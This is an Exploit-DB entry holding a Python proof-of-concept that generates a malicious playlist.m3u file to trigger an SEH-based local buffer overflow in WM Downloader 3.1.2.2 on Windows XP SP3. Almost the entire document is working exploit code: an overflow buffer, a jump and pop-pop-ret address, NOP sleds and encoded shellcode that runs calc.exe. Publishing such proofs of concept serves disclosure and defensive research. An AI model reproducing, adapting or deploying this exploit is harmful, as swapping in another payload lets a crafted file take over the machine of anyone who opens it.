WM Downloader 3.1.2.2 2010.04.15 - Local Buffer Overflow (SEH)

EDB-ID:

14497

CVE:



Author:

fdiskyou

Type:

local


Platform:

Windows

Date:

2010-07-28


#!/usr/bin/python
# Exploit Title: WM Downloader 3.1.2.2 2010.04.15 Buffer Overflow (SEH)
# Date: 2010-07-28
# Author: @fdiskyou
# e-mail: rui at deniable.org
# Version: 3.1.2.2 2010.04.15
# Tested on Windows XP SP3 en

payload = "\x41" * 43485 
payload += "\xeb\x16\x90\x90" # jump
payload += "\xb4\x15\xbb\x01" # ppr - WDCodec00.dll
payload += "\x90" * 16 
# windows/exec - 227 bytes x86/shikata_ga_nai EXITFUNC=thread, CMD=calc.exe
payload += ("\xdb\xdf\xd9\x74\x24\xf4\x58\x2b\xc9\xb1\x33\xba\x4c\xa8\x75"
"\x76\x83\xc0\x04\x31\x50\x13\x03\x1c\xbb\x97\x83\x60\x53\xde"
"\x6c\x98\xa4\x81\xe5\x7d\x95\x93\x92\xf6\x84\x23\xd0\x5a\x25"
"\xcf\xb4\x4e\xbe\xbd\x10\x61\x77\x0b\x47\x4c\x88\xbd\x47\x02"
"\x4a\xdf\x3b\x58\x9f\x3f\x05\x93\xd2\x3e\x42\xc9\x1d\x12\x1b"
"\x86\x8c\x83\x28\xda\x0c\xa5\xfe\x51\x2c\xdd\x7b\xa5\xd9\x57"
"\x85\xf5\x72\xe3\xcd\xed\xf9\xab\xed\x0c\x2d\xa8\xd2\x47\x5a"
"\x1b\xa0\x56\x8a\x55\x49\x69\xf2\x3a\x74\x46\xff\x43\xb0\x60"
"\xe0\x31\xca\x93\x9d\x41\x09\xee\x79\xc7\x8c\x48\x09\x7f\x75"
"\x69\xde\xe6\xfe\x65\xab\x6d\x58\x69\x2a\xa1\xd2\x95\xa7\x44"
"\x35\x1c\xf3\x62\x91\x45\xa7\x0b\x80\x23\x06\x33\xd2\x8b\xf7"
"\x91\x98\x39\xe3\xa0\xc2\x57\xf2\x21\x79\x1e\xf4\x39\x82\x30"
"\x9d\x08\x09\xdf\xda\x94\xd8\xa4\x05\x77\xc9\xd0\xad\x2e\x98"
"\x59\xb0\xd0\x76\x9d\xcd\x52\x73\x5d\x2a\x4a\xf6\x58\x76\xcc"
"\xea\x10\xe7\xb9\x0c\x87\x08\xe8\x6e\x46\x9b\x70\x5f\xed\x1b"
"\x12\x9f")
payload += "\x90" * 16

file = open("playlist.m3u", "w")
file.write(payload)
file.close()

print "m3u file generated successfuly"